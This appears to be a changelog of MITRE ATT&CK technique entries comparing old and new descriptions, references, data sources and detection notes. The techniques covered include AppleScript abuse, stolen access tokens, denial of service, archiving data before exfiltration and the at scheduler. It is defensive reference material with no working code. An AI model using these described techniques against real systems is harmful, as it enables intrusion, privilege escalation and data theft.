Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
| external_references[2]['source_name'] | SentinelOne AppleScript | SentinelOne macOS Red Team |
| external_references[2]['description'] | Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020. | Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ | https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ |
| external_references[3]['source_name'] | SentinelOne macOS Red Team | SentinelOne AppleScript |
| external_references[3]['description'] | Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020. | Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020. |
| external_references[3]['url'] | https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ | https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ |
| Old Description | New Description |
|---|---|
| Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-593 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-02 17:18:55.891000+00:00 | 2022-10-21 17:01:05.286000+00:00 |
| description | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. | Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow. |
| external_references[1]['source_name'] | capec | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/593.html | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ |
| external_references[2]['source_name'] | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 | AWS Logging IAM Calls |
| external_references[2]['description'] | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. | AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ | https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html |
| external_references[3]['source_name'] | okta | AWS Temporary Security Credentials |
| external_references[3]['description'] | okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019. | AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022. |
| external_references[3]['url'] | https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html |
| external_references[5]['source_name'] | Staaldraad Phishing with OAuth 2017 | Google Cloud Service Account Credentials |
| external_references[5]['description'] | Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019. | Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022. |
| external_references[5]['url'] | https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ | https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials |
| x_mitre_detection | Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. | Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage) |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GCP Monitoring Service Account Usage', 'description': 'Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/service-account-monitoring'} | |
| external_references | {'source_name': 'okta', 'description': 'okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.', 'url': 'https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen'} | |
| external_references | {'source_name': 'Rhino Security Labs Enumerating AWS Roles', 'description': 'Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration'} | |
| external_references | {'source_name': 'Staaldraad Phishing with OAuth 2017', 'description': 'Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.', 'url': 'https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/593.html', 'external_id': 'CAPEC-593'} | |
| x_mitre_contributors | Jen Burns, HubSpot | |
| x_mitre_contributors | Ian Davila, Tidal Cyber | |
| x_mitre_platforms | Containers | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Azure AD |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Application Log: Application Log Content |
| Old Description | New Description |
|---|---|
| Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018) | Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:08:52.118000+00:00 | 2022-03-25 18:07:45.176000+00:00 |
| description | Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018) | Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 15:44:27.068000+00:00 | 2022-04-19 02:07:41.751000+00:00 |
| description | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'} | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:09:41.559000+00:00 | 2022-03-25 18:11:13.604000+00:00 |
| description | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. | Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Sensor Health: Host Status |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 16:36:55.831000+00:00 | 2022-01-04 18:44:10.398000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Script: Script Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[2] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Script: Script Execution | Command: Command Execution |
| Old Description | New Description |
|---|---|
| An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. | Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options.
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mayan Arora aka Mayan Mohan'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 21:54:37.374000+00:00 | 2022-04-20 17:17:48.612000+00:00 |
| description | An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. | Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options.
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage) |
| external_references[1]['source_name'] | 7zip Homepage | WinRAR Homepage |
| external_references[1]['description'] | I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. | A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. |
| external_references[1]['url'] | https://www.7-zip.org/ | https://www.rarlab.com/ |
| external_references[2]['source_name'] | WinRAR Homepage | WinZip Homepage |
| external_references[2]['description'] | A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. | Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. |
| external_references[2]['url'] | https://www.rarlab.com/ | https://www.winzip.com/win/en/ |
| external_references[3]['source_name'] | WinZip Homepage | 7zip Homepage |
| external_references[3]['description'] | Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. | I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. |
| external_references[3]['url'] | https://www.winzip.com/win/en/ | https://www.7-zip.org/ |
| external_references[4]['source_name'] | Wikipedia File Header Signatures | diantz.exe_lolbas |
| external_references[4]['description'] | Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016. | Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021. |
| external_references[4]['url'] | https://en.wikipedia.org/wiki/List_of_file_signatures | https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia File Header Signatures', 'description': 'Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.', 'url': 'https://en.wikipedia.org/wiki/List_of_file_signatures'} |
| Old Description | New Description |
|---|---|
Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks. |
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 13:43:40.776000+00:00 | 2022-04-18 20:12:04.110000+00:00 |
| name | At (Windows) | At |
| description | Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks. |
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| external_references[1]['source_name'] | Twitter Leoloobeek Scheduled Task | rowland linux at 2019 |
| external_references[1]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. |
| external_references[1]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ |
| external_references[2]['source_name'] | TechNet Forum Scheduled Task Operational Setting | GTFObins at |
| external_references[2]['description'] | Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017. | Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021. |
| external_references[2]['url'] | https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen | https://gtfobins.github.io/gtfobins/at/ |
| external_references[3]['source_name'] | TechNet Scheduled Task Events | Linux at |
| external_references[3]['description'] | Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017. | IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022. |
| external_references[3]['url'] | https://technet.microsoft.com/library/dd315590.aspx | https://man7.org/linux/man-pages/man1/at.1p.html |
